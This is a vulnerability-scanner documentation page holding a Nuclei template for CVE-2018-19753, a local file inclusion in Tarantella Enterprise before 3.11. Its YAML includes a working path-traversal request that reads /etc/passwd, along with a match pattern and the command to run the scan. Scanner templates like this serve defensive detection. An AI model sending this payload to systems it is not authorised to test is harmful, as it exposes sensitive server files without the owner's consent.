Tarantella Enterprise <3.11 - Local File Inclusion
ID: CVE-2018-19753
Severity: high
Author: 0x_Akoko
Tags: cve,cve2018,packetstorm,seclists,tarantella,lfi,oracle
Description
Section titled “Description”Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion.
YAML Source
Section titled “YAML Source”id: CVE-2018-19753
info: name: Tarantella Enterprise <3.11 - Local File Inclusion author: 0x_Akoko severity: high description: | Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system. remediation: | Upgrade Tarantella Enterprise to version 3.11 or higher to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-19753 - http://seclists.org/fulldisclosure/2018/Nov/66 - http://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-19753 cwe-id: CWE-22 epss-score: 0.0066 epss-percentile: 0.79557 cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle product: tarantella_enterprise tags: cve,cve2018,packetstorm,seclists,tarantella,lfi,oracle
http: - method: GET path: - "{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 4b0a00483046022100b6ee83933e79cf265db89ba01f821ab3a5ca2beae1e4cd940104023038c21038022100a5129187d37d92b18318b6f61716db5e0fd969b7669294a50ddb5033fbaea870:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-19753.yaml"